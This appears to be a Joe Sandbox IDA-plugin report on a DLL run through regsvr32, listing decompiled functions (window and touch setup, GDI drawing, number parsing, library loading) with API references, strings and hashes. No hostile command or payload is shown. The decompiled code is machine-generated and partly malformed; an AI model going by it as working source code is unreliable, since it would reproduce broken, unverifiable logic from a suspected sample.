Function 00007FFA09503CB0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97registrywindowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FFA09503D39
RegisterTouchWindow.USER32 ref: 00007FFA09503D5A
MessageBoxW.USER32 ref: 00007FFA09503D7A

Strings

Error, xrefs: 00007FFA09503D67
Cannot register application window for multi-touch input, xrefs: 00007FFA09503D6E

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Window$CreateMessageRegisterTouch
String ID: Cannot register application window for multi-touch input$Error
API String ID: 490141109-480840240
Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction ID: 1cbf5199653ae7085dee4f32ff1ad49fbe849d40510661cb9c056fb18cc1c7e5
Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction Fuzzy Hash: 0C51B235A08B4682E7509F36F89436AB7A8FB8A794F508535DA8E477A4DF3CF148C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F2FC0 Relevance: 15.1, APIs: 10, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FFA7FFA094F2FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				long long _t108;
				long long _t110;
				intOrPtr* _t112;
				intOrPtr _t116;
				long long _t118;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x94f303c;
				E00007FFA7FFA094F18F0(__rax, _a8);
				_t100 = _a32 - __rax;
				_v64 = _a40;
				_v72 = _t100;
				E00007FFA7FFA094F3240(__edx, E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
				goto 0x94f3214;
				E00007FFA7FFA094F21F0(E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
				E00007FFA7FFA094F2400(E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
				_a24 = _t100;
				_t102 = 0xffffffff - _a40;
				_v40 = 0xffffffff;
				E00007FFA7FFA094F2170(_t102, _a8);
				_t104 =  *_t102 - _a24;
				if (_v40 - 0xffffffff > 0) goto 0x94f30aa;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170(_t104, _a8);
				_v56 =  *_t104 - _a24 - _a16;
				_t108 = _a24;
				if (_a40 - _t108 >= 0) goto 0x94f3126;
				E00007FFA7FFA094F18F0(_t108, _a8);
				_t110 = _t108 + _a16 + _a24;
				_v32 = _t110;
				E00007FFA7FFA094F18F0(_t110, _a8);
				_t112 = _t110 + _a16 + _a40;
				E00007FFA7FFA094F1230(_t112, _v32, _v56);
				E00007FFA7FFA094F2170(_t112, _a8);
				_v48 =  *_t112 + _a40 - _a24;
				if (_a40 > 0) goto 0x94f3162;
				if (_a24 <= 0) goto 0x94f320f;
				r8d = 0;
				if ((E00007FFA7FFA094F22B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x94f320f;
				_t116 = _a40;
				if (_a24 - _t116 >= 0) goto 0x94f31d9;
				E00007FFA7FFA094F18F0(_t116, _a8);
				_t118 = _t116 + _a16 + _a24;
				_v24 = _t118;
				E00007FFA7FFA094F18F0(_t118, _a8);
				_t120 = _t118 + _a16 + _a40;
				E00007FFA7FFA094F1230(_t118 + _a16 + _a40, _v24, _v56);
				E00007FFA7FFA094F18F0(_t118 + _a16 + _a40, _a8);
				E00007FFA7FFA094F11E0(_t120 + _a16, _a32, _a40);
				return E00007FFA7FFA094F23A0(_t120 + _a16, _a8, _v48);
			}

APIs

Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F226B
Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F2FF6

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Part of subcall function 00007FFA094F3240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F3310
Part of subcall function 00007FFA094F3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33A8
Part of subcall function 00007FFA094F3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33C2
Part of subcall function 00007FFA094F3240: char_traits.LIBCPMTD ref: 00007FFA094F33E2

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F30A5
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F30E3
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F30FF
char_traits.LIBCPMTD ref: 00007FFA094F3121
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3196
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F31B2
char_traits.LIBCPMTD ref: 00007FFA094F31D4
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F31DE
char_traits.LIBCPMTD ref: 00007FFA094F31FB

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
String ID:
API String ID: 4284633421-0
Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction ID: 4a0469f42dad977e0036629afcd00868c10ecd032e8c0613f23a0a0e309ca1cc
Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction Fuzzy Hash: 9751BF26A1CA8286DA60DF79F45136AA3A0FBC97C4F105136EBDD83B69DF2DD451CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F893C Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FFA7FFA094F893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				void* _t155;
				void* _t185;
				signed short _t199;
				signed short _t200;
				signed int _t201;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed short* _t380;
				signed short* _t381;
				signed short* _t382;
				signed short* _t384;
				signed short** _t385;
				long long _t386;
				long long* _t389;
				signed short* _t390;
				long long* _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				long long _t406;
				signed short* _t407;
				long long _t408;
				intOrPtr _t409;

				_t403 = __r8;
				_t394 = __rdx;
				_t386 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t406 =  *((intOrPtr*)(__rdx));
				r13d = 0;
				_t255 = r9b & 0xffffffff;
				r14d = r8d;
				_v64 = _t406;
				_t397 = __rdx;
				if (_t406 != 0) goto 0x94f8987;
				E00007FFA7FFA094FB420(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA094F9744();
				goto 0x94f89b9;
				if (r14d == 0) goto 0x94f89d1;
				_t4 = _t403 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0x94f89d1;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t408;
				E00007FFA7FFA094F9674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t389 = _t397[1];
				if (_t389 == 0) goto 0x94f901d;
				 *_t389 =  *_t397;
				goto 0x94f901d;
				 *_t394 = _t406 + 2;
				_t260 = r13d;
				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x94f89fb;
				0x94f9140();
				goto 0x94f89fb;
				_t378 =  *_t397;
				 *_t397 =  &(( *_t397)[1]);
				if (E00007FFA7FFA094FB244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x94f89ee;
				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x94f8a32;
				_t380 =  *_t397;
				_t199 =  *_t380 & 0x0000ffff;
				_t381 =  &(_t380[1]);
				 *_t397 = _t381;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t381 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0x94f8da0;
				if (_t199 - 0x30 < 0) goto 0x94f8cef;
				if (_t199 - 0x3a >= 0) goto 0x94f8b3e;
				goto 0x94f8cea;
				if (_t199 - 0xff10 >= 0) goto 0x94f8cdb;
				if (_t199 - r8w < 0) goto 0x94f8cef;
				if (_t199 - 0x66a >= 0) goto 0x94f8b66;
				goto 0x94f8cea;
				if (_t199 - r10w < 0) goto 0x94f8cef;
				if (_t199 - 0x6fa >= 0) goto 0x94f8b85;
				goto 0x94f8cea;
				if (_t199 - r11w < 0) goto 0x94f8cef;
				if (_t199 - 0x970 >= 0) goto 0x94f8ba4;
				goto 0x94f8cea;
				if (_t199 - r9w < 0) goto 0x94f8cef;
				if (_t199 - 0x9f0 >= 0) goto 0x94f8bc3;
				goto 0x94f8cea;
				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x94f8cef;
				if (_t199 - _a16 >= 0) goto 0x94f8be3;
				goto 0x94f8cea;
				if (_t199 - _v152 < 0) goto 0x94f8cef;
				if (_t199 - _v148 < 0) goto 0x94f8b34;
				if (_t199 - _v144 < 0) goto 0x94f8cef;
				if (_t199 - _v140 < 0) goto 0x94f8b34;
				if (_t199 - _v136 < 0) goto 0x94f8cef;
				if (_t199 - _v132 < 0) goto 0x94f8b34;
				if (_t199 - _v128 < 0) goto 0x94f8cef;
				if (_t199 - _v124 < 0) goto 0x94f8b34;
				if (_t199 - _v120 < 0) goto 0x94f8cef;
				if (_t199 - _v116 < 0) goto 0x94f8b34;
				if (_t199 - _v112 < 0) goto 0x94f8cef;
				if (_t199 - _v108 < 0) goto 0x94f8b34;
				if (_t199 - _v104 < 0) goto 0x94f8cef;
				if (_t199 - _v100 < 0) goto 0x94f8b34;
				if (_t199 - _v96 < 0) goto 0x94f8cef;
				if (_t199 - _v92 < 0) goto 0x94f8b34;
				if (_t199 - _v88 < 0) goto 0x94f8cef;
				if (_t199 - _v84 < 0) goto 0x94f8b34;
				if (_t199 - _v80 < 0) goto 0x94f8cef;
				if (_t199 - _v76 < 0) goto 0x94f8b34;
				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x94f8cef;
				goto 0x94f8b34;
				if (_t199 - _v68 >= 0) goto 0x94f8cef;
				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x94f8d11;
				_t64 = _t389 - 0x41; // -17
				_t65 = _t389 - 0x61; // -49
				_t155 = _t65;
				if (_t64 - 0x19 <= 0) goto 0x94f8d06;
				if (_t155 - 0x19 > 0) goto 0x94f8d91;
				if (_t155 - 0x19 > 0) goto 0x94f8d0e;
				_t66 = _t389 - 0x37; // -231
				if (_t66 != 0) goto 0x94f8d91;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t250 =  *_t390 & 0x0000ffff;
				_t67 =  &(_t390[1]); // 0xffe1
				_t404 = _t67;
				 *_t397 = _t404;
				_t68 = _t394 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0x94f8d79;
				 *_t397 = _t390;
				_t159 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t250 == 0) goto 0x94f8d71;
				if ( *_t390 == _t250) goto 0x94f8d71;
				E00007FFA7FFA094FB420(_t381);
				 *_t381 = 0x16;
				E00007FFA7FFA094F9744();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0x94f8da0;
				r8d = 0x660;
				goto 0x94f8da0;
				_t200 =  *_t404 & 0x0000ffff;
				_t71 =  &(_t404[1]); // 0xffe3
				_t382 = _t71;
				 *_t397 = _t382;
				r8d = 0x660;
				goto 0x94f8d96;
				_t164 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r12d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t200 - r12w < 0) goto 0x94f8f70;
				if (_t200 - 0x3a >= 0) goto 0x94f8dd2;
				goto 0x94f8f6b;
				if (_t200 - r15w >= 0) goto 0x94f8f5b;
				if (_t200 - r8w < 0) goto 0x94f8f70;
				if (_t200 - 0x66a >= 0) goto 0x94f8dfb;
				goto 0x94f8f6b;
				if (_t200 - r10w < 0) goto 0x94f8f70;
				if (_t200 - 0x6fa >= 0) goto 0x94f8e1a;
				goto 0x94f8f6b;
				if (_t200 - r11w < 0) goto 0x94f8f70;
				if (_t200 - 0x970 >= 0) goto 0x94f8e39;
				goto 0x94f8f6b;
				if (_t200 - 0x9e6 < 0) goto 0x94f8f70;
				_t76 =  &(_t382[5]); // 0x9f0
				if (_t200 - _t76 >= 0) goto 0x94f8e59;
				goto 0x94f8f6b;
				if (_t200 - 0xa66 < 0) goto 0x94f8f70;
				if (_t200 - _a16 < 0) goto 0x94f8e4f;
				if (_t200 - _v152 < 0) goto 0x94f8f70;
				if (_t200 - _v148 < 0) goto 0x94f8e4f;
				if (_t200 - _v144 < 0) goto 0x94f8f70;
				if (_t200 - _v140 < 0) goto 0x94f8e4f;
				if (_t200 - _v136 < 0) goto 0x94f8f70;
				if (_t200 - _v132 < 0) goto 0x94f8e4f;
				if (_t200 - _v128 < 0) goto 0x94f8f70;
				if (_t200 - _v124 < 0) goto 0x94f8e4f;
				if (_t200 - _v120 < 0) goto 0x94f8f70;
				if (_t200 - _v116 < 0) goto 0x94f8e4f;
				if (_t200 - _v112 < 0) goto 0x94f8f70;
				if (_t200 - _v108 < 0) goto 0x94f8e4f;
				if (_t200 - _v104 < 0) goto 0x94f8f70;
				if (_t200 - _v100 < 0) goto 0x94f8e4f;
				if (_t200 - _v96 < 0) goto 0x94f8f70;
				if (_t200 - _v92 < 0) goto 0x94f8e4f;
				if (_t200 - _v88 < 0) goto 0x94f8f70;
				if (_t200 - _v84 < 0) goto 0x94f8e4f;
				if (_t200 - _v80 < 0) goto 0x94f8f70;
				if (_t200 - _v76 < 0) goto 0x94f8e4f;
				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x94f8f70;
				goto 0x94f8f6b;
				if (_t200 - _v68 >= 0) goto 0x94f8f70;
				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x94f8f93;
				_t100 = _t390 - 0x41; // -65
				_t101 = _t390 - 0x61; // -97
				_t185 = _t101;
				if (_t100 - 0x19 <= 0) goto 0x94f8f83;
				if (_t185 - 0x19 > 0) goto 0x94f8f90;
				if (_t185 - 0x19 > 0) goto 0x94f8f8b;
				goto 0x94f8f93;
				_t405 =  *_t397;
				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x94f8fd7;
				_t201 =  *_t405 & 0x0000ffff;
				_t254 = _t382 + _t390;
				_t261 = _t254;
				_t107 =  &(_t405[1]); // 0x2
				r8d = 0x660;
				 *_t397 = _t107;
				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0x94f8db7;
				_t409 = _a8;
				_t109 = _t405 - 2; // -2
				_t384 = _t109;
				_t407 = _v64;
				 *_t397 = _t384;
				if (_t201 == 0) goto 0x94f9008;
				if ( *_t384 == _t201) goto 0x94f9008;
				E00007FFA7FFA094FB420(_t384);
				 *_t384 = 0x16;
				E00007FFA7FFA094F9744();
				if ((sil & 0x00000008) != 0) goto 0x94f9024;
				_t385 = _t397[1];
				 *_t397 = _t407;
				if (_t385 == 0) goto 0x94f901d;
				 *_t385 = _t407;
				goto 0x94f90a8;
				r8d = 0x80000000;
				_t114 = _t405 - 1; // -1
				r9d = _t114;
				if ((sil & 0x00000004) != 0) goto 0x94f904c;
				if ((sil & 0x00000001) == 0) goto 0x94f908f;
				if ((sil & 0x00000002) == 0) goto 0x94f9047;
				if (_t261 - r8d <= 0) goto 0x94f9095;
				goto 0x94f904c;
				if (_t261 - r9d <= 0) goto 0x94f9097;
				 *((char*)(_t409 + 0x30)) = 1;
				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
				if ((_t258 & 0x00000001) != 0) goto 0x94f9067;
				goto 0x94f9097;
				_t395 = _t397[1];
				if ((_t258 & 0x00000002) == 0) goto 0x94f907f;
				if (_t395 == 0) goto 0x94f907a;
				 *_t395 =  *_t397;
				goto 0x94f90a8;
				if (_t395 == 0) goto 0x94f908a;
				 *_t395 =  *_t397;
				goto 0x94f90a8;
				if ((sil & 0x00000002) == 0) goto 0x94f9097;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0x94f90a6;
				 *_t396 =  *_t397;
				return  ~(_t261 | 0xffffffff);
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFA094F8980
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA094F8D58
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA094F9003

Strings

-, xrefs: 00007FFA094F8A16
p, xrefs: 00007FFA094F8AAA
0, xrefs: 00007FFA094F8DA8
f, xrefs: 00007FFA094F8AA2
p, xrefs: 00007FFA094F8A32

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$0$f$p$p
API String ID: 3215553584-1865143739
Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction ID: 3a27e2ff6c8c5d14fa8bc27a843b138fbd2c318c9c520b8586501b5e6c809bc0
Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction Fuzzy Hash: C8129372A191438AFB209F35F06467A7652FB9A754F848131E68E4B7C4DF3EE5A0CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09502FA0 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FFA09502FCD
SelectObject.GDI32 ref: 00007FFA09502FE5
Polyline.GDI32 ref: 00007FFA09503230
MoveToEx.GDI32 ref: 00007FFA0950325C
LineTo.GDI32 ref: 00007FFA09503285
MoveToEx.GDI32 ref: 00007FFA095032B1
LineTo.GDI32 ref: 00007FFA095032DA
SelectObject.GDI32 ref: 00007FFA095032ED
DeleteObject.GDI32 ref: 00007FFA095032F8

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction ID: 1f7af5f7232e74e4b9848f2614480f676c90b53984fc3fbbfb8fa40313aeabb4
Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction Fuzzy Hash: 3891CB76618B408ADB65CB29F05132AF7A5F7C9784F148226DACE97B68DF3CD4498F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FD8F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00007FFA7FFA094FD8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				void* _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				WCHAR* _t93;
				long _t96;
				void* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				r15d = __ecx;
				_t90 =  *0x956e008; // 0x36754d591002
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x7ffa094f0000 + 0x7f840 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0x94fda36;
				if (_t72 == 0) goto 0x94fd959;
				_t57 = _t72;
				goto 0x94fda38;
				if (__r8 == __r9) goto 0x94fda1b;
				_t61 =  *((intOrPtr*)(0x7ffa094f0000 + 0x7f7a0 + __rsi * 8));
				if (_t61 == 0) goto 0x94fd980;
				if (_t61 != _t76) goto 0x94fda75;
				goto 0x94fda07;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t99, _t96);
				if (_t57 != 0) goto 0x94fda55;
				if (GetLastError() != 0x57) goto 0x94fd9f5;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E00007FFA7FFA094FF5B0(_t90) == 0) goto 0x94fd9f5;
				r8d = _t37;
				if (E00007FFA7FFA094FF5B0(_t90) == 0) goto 0x94fd9f5;
				r8d = 0;
				LoadLibraryExW(_t93, _t75);
				if (_t57 != 0) goto 0x94fda55;
				 *((intOrPtr*)(0x7ffa094f0000 + 0x7f7a0 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0x94fd962;
				_t91 =  *0x956e008; // 0x36754d591002
				asm("dec eax");
				 *(0x7ffa094f0000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

APIs

FreeLibrary.KERNEL32 ref: 00007FFA094FDA6F
GetProcAddress.KERNEL32 ref: 00007FFA094FDA7B

Strings

ext-ms-, xrefs: 00007FFA094FD9CC
api-ms-, xrefs: 00007FFA094FD9B9

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction ID: 755144290105ea7dde3393f70cb84c00cfc7de5ccccbb5460895ef85ced74e21
Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction Fuzzy Hash: 1B419E22F19A4381EB169F66B8246B52399AB4BBA0F48C235DD1D47784EF3DE459C304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FB8D4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFA094FB8E3
FlsGetValue.KERNEL32 ref: 00007FFA094FB8F8
FlsSetValue.KERNEL32 ref: 00007FFA094FB919
FlsSetValue.KERNEL32 ref: 00007FFA094FB946
FlsSetValue.KERNEL32 ref: 00007FFA094FB957
FlsSetValue.KERNEL32 ref: 00007FFA094FB968
SetLastError.KERNEL32 ref: 00007FFA094FB983

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
